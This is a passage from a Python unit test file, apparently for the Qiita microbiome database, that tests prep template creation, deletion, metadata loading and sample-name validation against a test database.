with open(barcodes_fp, "w") as f:
f.write("\n")
self.new_raw_data = RawData.create(2, [Study(1)], filepaths=filepaths)
db_test_raw_dir = join(get_db_files_base_dir(), 'raw_data')
db_seqs_fp = join(db_test_raw_dir, "5_%s" % basename(seqs_fp))
db_barcodes_fp = join(db_test_raw_dir, "5_%s" % basename(barcodes_fp))
self._clean_up_files = [db_seqs_fp, db_barcodes_fp]
self.tester = PrepTemplate(1)
self.exp_sample_ids = {
'1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195', '1.SKB4.640189',
'1.SKB5.640181', '1.SKB6.640176', '1.SKB7.640196', '1.SKB8.640193',
'1.SKB9.640200', '1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190', '1.SKD7.640191',
'1.SKD8.640184', '1.SKD9.640182', '1.SKM1.640183', '1.SKM2.640199',
'1.SKM3.640197', '1.SKM4.640180', '1.SKM5.640177', '1.SKM6.640187',
'1.SKM7.640188', '1.SKM8.640201', '1.SKM9.640192'}
def tearDown(self):
for f in self._clean_up_files:
remove(f)
def test_study_id(self):
"""Ensure that the correct study ID is returned"""
self.assertEqual(self.tester.study_id, 1)
def test_init_unknown_error(self):
"""Init raises an error if the id is not known"""
with self.assertRaises(QiitaDBUnknownIDError):
PrepTemplate(2)
def test_init(self):
"""Init successfully instantiates the object"""
st = PrepTemplate(1)
self.assertEqual(st.id, 1)
def test_table_name(self):
"""Table name return the correct string"""
obs = PrepTemplate._table_name(1)
self.assertEqual(obs, "prep_1")
def test_create_duplicate_header(self):
"""Create raises an error when duplicate headers are present"""
self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],
index=self.metadata.index)
with self.assertRaises(QiitaDBDuplicateHeaderError):
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
def test_create_bad_sample_names(self):
# set a horrible list of sample names
self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
def test_create_unknown_sample_names(self):
# set two real and one fake sample name
self.metadata_dict['NOTREAL'] = self.metadata_dict['SKB7.640196']
del self.metadata_dict['SKB7.640196']
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
# Test error raised and correct error given
with self.assertRaises(QiitaDBExecutionError) as err:
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
self.assertEqual(
str(err.exception), 'Samples found in prep template but not sample'
' template: 1.NOTREAL')
def test_create_shorter_prep_template(self):
# remove one sample so the prep template has fewer samples than
# the sample template
del self.metadata_dict['SKB7.640196']
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
# make sure the two samples were added correctly
self.assertEqual(pt.id, 2)
obs = self.conn_handler.execute_fetchall(
"SELECT sample_id FROM qiita.prep_2")
exp = [['1.SKB8.640193'], ['1.SKD8.640184']]
self.assertEqual(obs, exp)
def test_create_error_cleanup(self):
"""Create does not modify the database if an error happens"""
metadata_dict = {
'SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'group': 2,
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'GTCCGCAAGTTA',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'group': 1,
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CGTAGAGCTCTC',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'group': 'Value for sample 3',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CCTCTGAGAGCT',
'run_prefix': "s_G1_L002_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
exp_id = get_count("qiita.prep_template") + 1
with self.assertRaises(QiitaDBExecutionError):
PrepTemplate.create(metadata, self.new_raw_data,
self.test_study, self.data_type)
sql = """SELECT EXISTS(
SELECT * FROM qiita.prep_template
WHERE prep_template_id=%s)"""
self.assertFalse(self.conn_handler.execute_fetchone(sql, (exp_id,))[0])
sql = """SELECT EXISTS(
SELECT * FROM qiita.common_prep_info
WHERE prep_template_id=%s)"""
self.assertFalse(self.conn_handler.execute_fetchone(sql, (exp_id,))[0])
sql = """SELECT EXISTS(
SELECT * FROM qiita.prep_columns
WHERE prep_template_id=%s)"""
self.assertFalse(self.conn_handler.execute_fetchone(sql, (exp_id,))[0])
self.assertFalse(exists_table("prep_%d" % exp_id, self.conn_handler))
def test_create(self):
"""Creates a new PrepTemplate"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
# The returned object has the correct id
self.assertEqual(pt.id, 2)
# The row in the prep template table has been created
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
# prep_template_id, data_type_id, raw_data_id, preprocessing_status,
# investigation_type
self.assertEqual(obs, [[2, 2, 5, 'not_preprocessed', None]])
# The relevant rows have been added to common_prep_info
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
# prep_template_id, sample_id, center_name,
# center_project_name, emp_status_id
exp = [[2, '1.SKB8.640193', 'ANL', 'Test Project', 1],
[2, '1.SKD8.640184', 'ANL', 'Test Project', 1],
[2, '1.SKB7.640196', 'ANL', 'Test Project', 1]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the prep_columns table
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
# prep_template_id, column_name, column_type
exp = [[2, 'str_column', 'varchar'],
[2, 'ebi_submission_accession', 'varchar'],
[2, 'run_prefix', 'varchar'],
[2, 'barcodesequence', 'varchar'],
[2, 'linkerprimersequence', 'varchar'],
[2, 'platform', 'varchar'],
[2, 'experiment_design_description', 'varchar'],
[2, 'library_construction_protocol', 'varchar']]
self.assertEqual(sorted(obs), sorted(exp))
# The new table exists
self.assertTrue(exists_table("prep_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
# sample_id, str_column, platform, run_prefix, barcodesequence,
# ebi_submission_accession, linkerprimersequence,
# experiment_design_description, library_construction_protocol
exp = [['1.SKB7.640196', 'Value for sample 3', 'ILLUMINA',
's_G1_L002_sequences', 'CCTCTGAGAGCT', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKB8.640193', 'Value for sample 1', 'ILLUMINA',
's_G1_L001_sequences', 'GTCCGCAAGTTA', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKD8.640184', 'Value for sample 2', 'ILLUMINA',
's_G1_L001_sequences', 'CGTAGAGCTCTC', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA']]
self.assertEqual(sorted(obs), sorted(exp))
# prep and qiime files have been created
filepaths = pt.get_filepaths()
self.assertEqual(len(filepaths), 2)
self.assertEqual(filepaths[0][0], 22)
self.assertEqual(filepaths[1][0], 21)
def test_create_already_prefixed_samples(self):
"""Creates a new PrepTemplate"""
pt = npt.assert_warns(QiitaDBWarning, PrepTemplate.create,
self.metadata_prefixed, self.new_raw_data,
self.test_study, self.data_type)
# The returned object has the correct id
self.assertEqual(pt.id, 2)
# The row in the prep template table has been created
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
# prep_template_id, data_type_id, raw_data_id, preprocessing_status,
# investigation_type
self.assertEqual(obs, [[2, 2, 5, 'not_preprocessed', None]])
# The relevant rows have been added to common_prep_info
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
# prep_template_id, sample_id, center_name,
# center_project_name, emp_status_id
exp = [[2, '1.SKB8.640193', 'ANL', 'Test Project', 1],
[2, '1.SKD8.640184', 'ANL', 'Test Project', 1],
[2, '1.SKB7.640196', 'ANL', 'Test Project', 1]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the prep_columns table
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
# prep_template_id, column_name, column_type
exp = [[2, 'str_column', 'varchar'],
[2, 'ebi_submission_accession', 'varchar'],
[2, 'run_prefix', 'varchar'],
[2, 'barcodesequence', 'varchar'],
[2, 'linkerprimersequence', 'varchar'],
[2, 'platform', 'varchar'],
[2, 'experiment_design_description', 'varchar'],
[2, 'library_construction_protocol', 'varchar']]
self.assertEqual(sorted(obs), sorted(exp))
# The new table exists
self.assertTrue(exists_table("prep_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
# sample_id, str_column, platform, run_prefix, barcodesequence,
# ebi_submission_accession, linkerprimersequence,
# experiment_design_description, library_construction_protocol
exp = [['1.SKB7.640196', 'Value for sample 3', 'ILLUMINA',
's_G1_L002_sequences', 'CCTCTGAGAGCT', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKB8.640193', 'Value for sample 1', 'ILLUMINA',
's_G1_L001_sequences', 'GTCCGCAAGTTA', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKD8.640184', 'Value for sample 2', 'ILLUMINA',
's_G1_L001_sequences', 'CGTAGAGCTCTC', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA']]
self.assertEqual(sorted(obs), sorted(exp))
# prep and qiime files have been created
filepaths = pt.get_filepaths()
self.assertEqual(len(filepaths), 2)
self.assertEqual(filepaths[0][0], 22)
self.assertEqual(filepaths[1][0], 21)
def test_create_qiime_mapping_file(self):
pt = PrepTemplate(1)
# creating prep template file
_id, fp = get_mountpoint('templates')[0]
fpp = join(fp, '%d_prep_%d_%s.txt' % (pt.study_id, pt.id,
strftime("%Y%m%d-%H%M%S")))
pt.to_file(fpp)
pt.add_filepath(fpp)
_, filepath = pt.get_filepaths()[0]
obs_fp = pt.create_qiime_mapping_file(filepath)
exp_fp = join(fp, '1_prep_1_qiime_19700101-000000.txt')
obs = pd.read_csv(obs_fp, sep='\t', infer_datetime_format=True,
parse_dates=True, index_col=False, comment='\t')
exp = pd.read_csv(exp_fp, sep='\t', infer_datetime_format=True,
parse_dates=True, index_col=False, comment='\t')
assert_frame_equal(obs, exp)
# test the failure case: rewrite the prep template, replacing one line
# with a fake sample and truncating the remainder
with open(filepath, 'r') as filepath_fh:
data = filepath_fh.read().splitlines()
with open(filepath, 'w') as filepath_fh:
for i, d in enumerate(data):
if i == 4:
# adding fake sample
line = d.split('\t')
line[0] = 'fake_sample'
line = '\t'.join(line)
filepath_fh.write(line + '\n')
break
filepath_fh.write(d + '\n')
with self.assertRaises(ValueError):
pt.create_qiime_mapping_file(filepath)
def test_create_data_type_id(self):
"""Creates a new PrepTemplate passing the data_type_id"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
# The returned object has the correct id
self.assertEqual(pt.id, 2)
# The row in the prep template table has been created
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
# prep_template_id, data_type_id, raw_data_id, preprocessing_status,
# investigation_type
self.assertEqual(obs, [[2, 2, 5, 'not_preprocessed', None]])
# The relevant rows have been added to common_prep_info
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
# prep_template_id, sample_id, center_name,
# center_project_name, emp_status_id
exp = [[2, '1.SKB8.640193', 'ANL', 'Test Project', 1],
[2, '1.SKD8.640184', 'ANL', 'Test Project', 1],
[2, '1.SKB7.640196', 'ANL', 'Test Project', 1]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the prep_columns table
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
# prep_template_id, column_name, column_type
exp = [[2, 'str_column', 'varchar'],
[2, 'ebi_submission_accession', 'varchar'],
[2, 'run_prefix', 'varchar'],
[2, 'barcodesequence', 'varchar'],
[2, 'linkerprimersequence', 'varchar'],
[2, 'platform', 'varchar'],
[2, 'experiment_design_description', 'varchar'],
[2, 'library_construction_protocol', 'varchar']]
self.assertEqual(sorted(obs), sorted(exp))
# The new table exists
self.assertTrue(exists_table("prep_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
# sample_id, str_column, platform, run_prefix, barcodesequence,
# ebi_submission_accession, linkerprimersequence,
# experiment_design_description, library_construction_protocol
exp = [['1.SKB7.640196', 'Value for sample 3', 'ILLUMINA',
's_G1_L002_sequences', 'CCTCTGAGAGCT', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKB8.640193', 'Value for sample 1', 'ILLUMINA',
's_G1_L001_sequences', 'GTCCGCAAGTTA', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKD8.640184', 'Value for sample 2', 'ILLUMINA',
's_G1_L001_sequences', 'CGTAGAGCTCTC', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA']]
self.assertEqual(sorted(obs), sorted(exp))
def test_create_error(self):
"""Create raises an error if any required columns are missing
"""
metadata_dict = {
'1.SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status_id': 1,
'str_column': 'Value for sample 1'},
'1.SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status_id': 1,
'str_column': 'Value for sample 2'},
'1.SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status_id': 1,
'str_column': 'Value for sample 3'}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(metadata, self.new_raw_data, self.test_study,
self.data_type)
def test_create_error_template_special(self):
"""Create raises an error if not all columns are on the template"""
metadata_dict = {
'1.SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 1',
'barcodesequence': 'GTCCGCAAGTTA'},
'1.SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 2',
'barcodesequence': 'CGTAGAGCTCTC'},
'1.SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 3',
'barcodesequence': 'CCTCTGAGAGCT'}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(metadata, self.new_raw_data, self.test_study,
self.data_type)
def test_create_investigation_type_error(self):
"""Create raises an error if the investigation_type does not exists"""
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id,
'Not a term')
def test_delete_error(self):
"""Try to delete a prep template that already has preprocessed data"""
with self.assertRaises(QiitaDBExecutionError):
PrepTemplate.delete(1)
def test_delete_unknown_id_error(self):
"""Try to delete a non-existent prep template"""
with self.assertRaises(QiitaDBUnknownIDError):
PrepTemplate.delete(5)
def test_delete(self):
"""Deletes prep template 2"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
PrepTemplate.delete(pt.id)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
exp = []
self.assertEqual(obs, exp)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
exp = []
self.assertEqual(obs, exp)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
exp = []
self.assertEqual(obs, exp)
with self.assertRaises(QiitaDBExecutionError):
self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
def test_exists_true(self):
"""Exists returns true when the PrepTemplate already exists"""
self.assertTrue(PrepTemplate.exists(1))
def test_exists_false(self):
"""Exists returns false when the PrepTemplate does not exists"""
self.assertFalse(PrepTemplate.exists(2))
def test_get_sample_ids(self):
"""get_sample_ids returns the correct set of sample ids"""
obs = self.tester._get_sample_ids(self.conn_handler)
self.assertEqual(obs, self.exp_sample_ids)
def test_len(self):
"""Len returns the correct number of sample ids"""
self.assertEqual(len(self.tester), 27)
def test_getitem(self):
"""Get item returns the correct sample object"""
obs = self.tester['1.SKM7.640188']
exp = PrepSample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_getitem_error(self):
"""Get item raises an error if key does not exists"""
with self.assertRaises(KeyError):
self.tester['Not_a_Sample']
def test_setitem(self):
"""setitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
self.tester['1.SKM7.640188'] = PrepSample('1.SKM7.640188',
self.tester)
def test_delitem(self):
"""delitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
del self.tester['1.SKM7.640188']
def test_iter(self):
"""iter returns an iterator over the sample ids"""
obs = iter(self.tester)
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_contains_true(self):
"""contains returns true if the sample id exists"""
self.assertTrue('1.SKM7.640188' in self.tester)
def test_contains_false(self):
"""contains returns false if the sample id does not exists"""
self.assertFalse('Not_a_Sample' in self.tester)
def test_keys(self):
"""keys returns an iterator over the sample ids"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {PrepSample('1.SKB1.640202', self.tester),
PrepSample('1.SKB2.640194', self.tester),
PrepSample('1.SKB3.640195', self.tester),
PrepSample('1.SKB4.640189', self.tester),
PrepSample('1.SKB5.640181', self.tester),
PrepSample('1.SKB6.640176', self.tester),
PrepSample('1.SKB7.640196', self.tester),
PrepSample('1.SKB8.640193', self.tester),
PrepSample('1.SKB9.640200', self.tester),
PrepSample('1.SKD1.640179', self.tester),
PrepSample('1.SKD2.640178', self.tester),
PrepSample('1.SKD3.640198', self.tester),
PrepSample('1.SKD4.640185', self.tester),
PrepSample('1.SKD5.640186', self.tester),
PrepSample('1.SKD6.640190', self.tester),
PrepSample('1.SKD7.640191', self.tester),
PrepSample('1.SKD8.640184', self.tester),
PrepSample('1.SKD9.640182', self.tester),
PrepSample('1.SKM1.640183', self.tester),
PrepSample('1.SKM2.640199', self.tester),
PrepSample('1.SKM3.640197', self.tester),
PrepSample('1.SKM4.640180', self.tester),
PrepSample('1.SKM5.640177', self.tester),
PrepSample('1.SKM6.640187', self.tester),
PrepSample('1.SKM7.640188', self.tester),
PrepSample('1.SKM8.640201', self.tester),
PrepSample('1.SKM9.640192', self.tester)}
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs), key=lambda x: x.id),
sorted(exp, key=lambda x: x.id)):
self.assertEqual(o, e)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = [('1.SKB1.640202', PrepSample('1.SKB1.640202', self.tester)),
('1.SKB2.640194', PrepSample('1.SKB2.640194', self.tester)),
('1.SKB3.640195', PrepSample('1.SKB3.640195', self.tester)),
('1.SKB4.640189', PrepSample('1.SKB4.640189', self.tester)),
('1.SKB5.640181', PrepSample('1.SKB5.640181', self.tester)),
('1.SKB6.640176', PrepSample('1.SKB6.640176', self.tester)),
('1.SKB7.640196', PrepSample('1.SKB7.640196', self.tester)),
('1.SKB8.640193', PrepSample('1.SKB8.640193', self.tester)),
('1.SKB9.640200', PrepSample('1.SKB9.640200', self.tester)),
('1.SKD1.640179', PrepSample('1.SKD1.640179', self.tester)),
('1.SKD2.640178', PrepSample('1.SKD2.640178', self.tester)),
('1.SKD3.640198', PrepSample('1.SKD3.640198', self.tester)),
('1.SKD4.640185', PrepSample('1.SKD4.640185', self.tester)),
('1.SKD5.640186', PrepSample('1.SKD5.640186', self.tester)),
('1.SKD6.640190', PrepSample('1.SKD6.640190', self.tester)),
('1.SKD7.640191', PrepSample('1.SKD7.640191', self.tester)),
('1.SKD8.640184', PrepSample('1.SKD8.640184', self.tester)),
('1.SKD9.640182', PrepSample('1.SKD9.640182', self.tester)),
('1.SKM1.640183', PrepSample('1.SKM1.640183', self.tester)),
('1.SKM2.640199', PrepSample('1.SKM2.640199', self.tester)),
('1.SKM3.640197', PrepSample('1.SKM3.640197', self.tester)),
('1.SKM4.640180', PrepSample('1.SKM4.640180', self.tester)),
('1.SKM5.640177', PrepSample('1.SKM5.640177', self.tester)),
('1.SKM6.640187', PrepSample('1.SKM6.640187', self.tester)),
('1.SKM7.640188', PrepSample('1.SKM7.640188', self.tester)),
('1.SKM8.640201', PrepSample('1.SKM8.640201', self.tester)),
('1.SKM9.640192', PrepSample('1.SKM9.640192', self.tester))]
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs)), sorted(exp)):
self.assertEqual(o, e)
def test_get(self):
"""get returns the correct PrepSample object"""
obs = self.tester.get('1.SKM7.640188')
exp = PrepSample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_get_none(self):
"""get returns none if the sample id is not present"""
self.assertTrue(self.tester.get('Not_a_Sample') is None)
def test_to_file(self):
"""to file writes a tab delimited file with all the metadata"""
fd, fp = mkstemp()
close(fd)
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
pt.to_file(fp)
self._clean_up_files.append(fp)
with open(fp, 'U') as f:
obs = f.read()
self.assertEqual(obs, EXP_PREP_TEMPLATE)
def test_data_type(self):
"""data_type returns the string with the data_type"""
self.assertEqual(self.tester.data_type(), "18S")
def test_data_type_id(self):
"""data_type returns the int with the data_type_id"""
self.assertTrue(self.tester.data_type(ret_id=True), 2)
def test_raw_data(self):
"""Returns the raw_data associated with the prep template"""
self.assertEqual(self.tester.raw_data, 1)
def test_preprocessed_data(self):
"""Returns the preprocessed data list generated from this template"""
self.assertEqual(self.tester.preprocessed_data, [1, 2])
def test_preprocessing_status(self):
"""preprocessing_status works correctly"""
# Success case
pt = PrepTemplate(1)
self.assertEqual(pt.preprocessing_status, 'success')
# not preprocessed case
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
self.assertEqual(pt.preprocessing_status, 'not_preprocessed')
def test_preprocessing_status_setter(self):
"""Able to update the preprocessing status"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
self.assertEqual(pt.preprocessing_status, 'not_preprocessed')
pt.preprocessing_status = 'preprocessing'
self.assertEqual(pt.preprocessing_status, 'preprocessing')
pt.preprocessing_status = 'success'
self.assertEqual(pt.preprocessing_status, 'success')
def test_preprocessing_status_setter_failed(self):
"""Able to update preprocessing_status with a failure message"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
state = 'failed: some error message'
self.assertEqual(pt.preprocessing_status, 'not_preprocessed')
pt.preprocessing_status = state
self.assertEqual(pt.preprocessing_status, state)
def test_preprocessing_status_setter_valueerror(self):
"""Raises an error if the status is not recognized"""
with self.assertRaises(ValueError):
self.tester.preprocessing_status = 'not a valid state'
def test_investigation_type(self):
"""investigation_type works correctly"""
self.assertEqual(self.tester.investigation_type, "Metagenomics")
def test_investigation_type_setter(self):
"""Able to update the investigation type"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
self.assertEqual(pt.investigation_type, None)
pt.investigation_type = "Other"
self.assertEqual(pt.investigation_type, 'Other')
with self.assertRaises(QiitaDBColumnError):
pt.investigation_type = "should fail"
def test_investigation_type_instance_setter(self):
pt = PrepTemplate(1)
pt.investigation_type = 'RNASeq'
self.assertEqual(pt.investigation_type, 'RNASeq')
class TestUtilities(TestCase):
def test_load_template_to_dataframe(self):
obs = load_template_to_dataframe(StringIO(EXP_SAMPLE_TEMPLATE))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_duplicate_cols(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_DUPE_COLS))
obs = list(obs.columns)
exp = ['collection_timestamp', 'description', 'has_extracted_data',
'has_physical_specimen', 'host_subject_id', 'latitude',
'longitude', 'physical_location', 'required_sample_info_status',
'sample_type', 'str_column', 'str_column']
self.assertEqual(obs, exp)
def test_load_template_to_dataframe_scrubbing(self):
obs = load_template_to_dataframe(StringIO(EXP_SAMPLE_TEMPLATE_SPACES))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_columns(self):
obs = npt.assert_warns(QiitaDBWarning, load_template_to_dataframe,
StringIO(EXP_ST_SPACES_EMPTY_COLUMN))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_rows(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_SPACES_EMPTY_ROW))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_no_sample_name_cast(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES))
exp = pd.DataFrame.from_dict(
SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES_DICT_FORM)
exp.index.name = 'sample_name'
obs.sort_index(inplace=True)
exp.sort_index(inplace=True)
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_sample_names(self):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_NO_SAMPLE_NAMES))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_NO_SAMPLE_NAMES_SOME_SPACES))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_column(self):
obs = npt.assert_warns(QiitaDBWarning, load_template_to_dataframe,
StringIO(SAMPLE_TEMPLATE_EMPTY_COLUMN))
exp = pd.DataFrame.from_dict(ST_EMPTY_COLUMN_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_column_with_nas(self):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_COLUMN_WITH_NAS))
exp = pd.DataFrame.from_dict(ST_COLUMN_WITH_NAS_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_exception(self):
with self.assertRaises(QiitaDBColumnError):
x = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_NO_SAMPLE_NAME))
# prevent flake8 from complaining
x.strip()
def test_load_template_to_dataframe_whitespace(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_WHITESPACE))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_get_invalid_sample_names(self):
all_valid = ['2.sample.1', 'foo.bar.baz', 'roses', 'are', 'red',
'v10l3t5', '4r3', '81u3']
obs = get_invalid_sample_names(all_valid)
self.assertEqual(obs, [])
all_valid = ['sample.1', 'sample.2', 'SAMPLE.1', 'BOOOM']
obs = get_invalid_sample_names(all_valid)
self.assertEqual(obs, [])
def test_get_invalid_sample_names_str(self):
one_invalid = ['2.sample.1', 'foo.bar.baz', 'roses', 'are', 'red',
'I am the chosen one', 'v10l3t5', '4r3', '81u3']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, ['I am the chosen one'])
one_invalid = ['2.sample.1', 'foo.bar.baz', 'roses', 'are', 'red',
':L{=<', ':L}=<', '4r3', '81u3']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, [':L{=<', ':L}=<'])
def test_get_invalid_sample_names_mixed(self):
one_invalid = ['.', '1', '2']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, [])
one_invalid = [' ', ' ', ' ']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, [' ', ' ', ' '])
def test_invalid_lat_long(self):
